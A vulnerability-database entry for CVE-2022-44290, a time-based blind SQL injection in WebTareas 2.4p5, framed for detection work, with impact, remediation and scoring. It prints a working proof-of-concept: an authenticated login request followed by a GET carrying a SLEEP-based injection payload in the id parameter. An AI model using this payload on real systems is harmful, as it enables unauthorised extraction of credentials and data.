🔙 목록으로 돌아가기

CVE-2022-44290: WebTareas 2.4p5 - SQL Injection

TitleWebTareas 2.4p5 - SQL Injection
Authortheamanrawat
SeverityCritical
ImpactAuthenticated attackers can execute time-based blind SQL injection through the id parameter in deleteapprovalstages.php, potentially extracting sensitive database information including task data, user credentials, and project information from WebTareas.
RemediationUpdate WebTareas to a version later than 2.4p5 that properly sanitizes and parameterizes the id parameter in deleteapprovalstages.php.
CVSS Score9.8
EPSS Score0.54961
CVE IDCVE-2022-44290
CWE IDCWE-89
Tags time-based-sqli cve cve2022 sqli webtareas authenticated intrusive webtareas_project vuln

🔍 Vulnerability Description

webTareas 2.4p5 was discovered to contain a SQL injection vulnerability via the id parameter in deleteapprovalstages.php.

🌐 HTTP Request

POST /general/login.php?session=false HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
Connection: close
Content-Length: 538
Content-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525
Accept-Encoding: gzip

-----------------------------3023071625140724693672385525

Content-Disposition: form-data; name="action"



login

-----------------------------3023071625140724693672385525

Content-Disposition: form-data; name="loginForm"



ZlazzP

-----------------------------3023071625140724693672385525

Content-Disposition: form-data; name="passwordForm"



NdnYyJ

-----------------------------3023071625140724693672385525

Content-Disposition: form-data; name="loginSubmit"



Log In

-----------------------------3023071625140724693672385525--
GET /approvals/deleteapprovalstages.php?id=1)+AND+(SELECT+3830+FROM+(SELECT(SLEEP(6)))MbGE)+AND+(6162=6162 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-44290.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-44290.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A